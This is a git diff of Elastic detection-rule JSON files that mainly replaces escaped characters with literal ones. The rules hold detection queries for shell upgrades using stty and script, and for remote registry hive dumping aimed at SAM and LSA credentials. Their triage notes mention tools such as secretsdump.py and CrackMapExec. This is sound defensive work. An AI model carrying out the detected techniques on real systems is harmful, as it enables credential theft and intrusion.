a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json index cc4d1e0a997..01fc2ad1328 100644 --- a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_2.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json index ee6555e5da4..2b955d5967b 100644 --- a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json +++ b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_1.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Upgrade of Non-interactive Shell", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count \u003e= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count >= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json index a0eb1ffae49..0410fe4f74b 100644 --- a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json +++ b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_2.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Upgrade of Non-interactive Shell", - "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count \u003e= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and event.type == \"start\" and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count >= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json index b844294f5c6..fb74842f16c 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_104.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json index d0586e31923..fd11cbd87e8 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_105.json @@ -57,7 +57,7 @@ ], "risk_score": 21, "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json index 3368291f6d9..11e1d7c44c0 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_106.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json index 6b1f9261df6..895f3f29108 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_107.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json index 9a96243c00b..38cf1e0e423 100644 --- a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_108.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json index 34e458693e8..5a00b4c727b 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_105.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where host.os.type == \"windows\" and event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where host.os.type == \"windows\" and event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -102,7 +102,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -115,7 +115,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -137,7 +137,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json index ee86936942e..960782ea8dd 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_106.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -97,7 +97,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -110,7 +110,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -132,7 +132,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json index 4d4c8c84ffe..c6e4e6ce194 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_107.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", + "query": "sequence by host.id, user.id with maxspan=1m\n [authentication where\n event.outcome == \"success\" and event.action == \"logged-in\" and\n winlog.logon.type == \"Network\" and not user.name == \"ANONYMOUS LOGON\" and\n not user.domain == \"NT AUTHORITY\" and source.ip != \"127.0.0.1\" and source.ip !=\"::1\"]\n [file where event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n not file.path :\n (\"?:\\\\Windows\\\\system32\\\\HKEY_LOCAL_MACHINE_SOFTWARE_Microsoft_*.registry\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\UsrClass.dat\",\n \"?:\\\\Users\\\\*\\\\ntuser.dat.LOG?\",\n \"?:\\\\Users\\\\*\\\\NTUSER.DAT\")]\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -97,7 +97,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -109,7 +109,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -131,7 +131,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json index 28dd2684e98..b0488d5783f 100644 --- a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_108.json @@ -14,7 +14,7 @@ "license": "Elastic License v2", "name": "Potential Remote Credential Access via Registry", "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size \u003e= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", "references": [ "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", "https://www.elastic.co/security-labs/detect-credential-access" @@ -72,7 +72,7 @@ ], "risk_score": 73, "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", - "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "This rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -85,7 +85,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -107,7 +107,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE 